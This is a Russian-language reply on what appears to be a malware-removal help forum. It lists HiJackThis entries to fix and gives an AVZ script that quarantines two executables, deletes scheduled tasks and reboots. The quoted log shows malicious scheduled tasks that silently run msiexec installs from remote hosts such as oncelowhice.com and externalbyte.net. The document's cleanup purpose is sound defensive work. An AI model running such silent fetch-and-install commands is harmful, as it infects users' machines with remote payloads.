Здравствуйте,
HiJackThis (из каталога autologger)профиксить
Код:
O9-32 - Button: HKLM\..\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - &Связанные заметки OneNote - (no file)
O9-32 - Tools menu item: HKLM\..\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - &Связанные заметки OneNote - (no file)
O22 - Task: {04FF85FA-5DD8-B087-5C39-AF9E8334AB93} - C:\Windows\system32\OpenWith.exe http://hotivit.net/cl/?guid=om6zobczir1twlb9xyp9z6058wsp36gi&prid=1&pid=4_1009_0
O22 - Task: {1E726EA7-BBAA-3AB7-3F44-23AB36A254D3} - C:\Windows\system32\msiexec.exe /q /i http://oncelowhice.com/gyhyaao.ige
O22 - Task: {2DB516C3-72C2-2B88-81F5-457B94C96147} - C:\Windows\system32\msiexec.exe /i http://oncelowhice.com/euouuuw.ctb /q
O22 - Task: {4726F51A-63EC-170D-A7C8-76D4422F8DBF} - C:\Users\anton\euUEconqSIc.exe /q /i http://externalbyte.net/mxkhuhsfnvog.fhi
O22 - Task: {8403BF23-D900-9F01-DA07-46D6FD769CAF} - C:\Windows\SysWOW64\QIcUpf.exe /q /i http://externalbyte.net/a8xl3zigigcl.yen
AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
Код:
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\anton\euUEconqSIc.exe','');
QuarantineFile('C:\Windows\SysWOW64\QIcUpf.exe','');
DeleteFile('C:\Users\anton\euUEconqSIc.exe','32');
DeleteFile('C:\Windows\SysWOW64\QIcUpf.exe','32');
ExecuteFile('schtasks.exe', '/delete /TN "{04FF85FA-5DD8-B087-5C39-AF9E8334AB93}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{1E726EA7-BBAA-3AB7-3F44-23AB36A254D3}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{2DB516C3-72C2-2B88-81F5-457B94C96147}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{4726F51A-63EC-170D-A7C8-76D4422F8DBF}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{8403BF23-D900-9F01-DA07-46D6FD769CAF}" /F', 0, 15000, true);
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.
После перезагрузки:
- Выполните в AVZ:
Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
- Подготовьте лог AdwCleaner и приложите его в теме.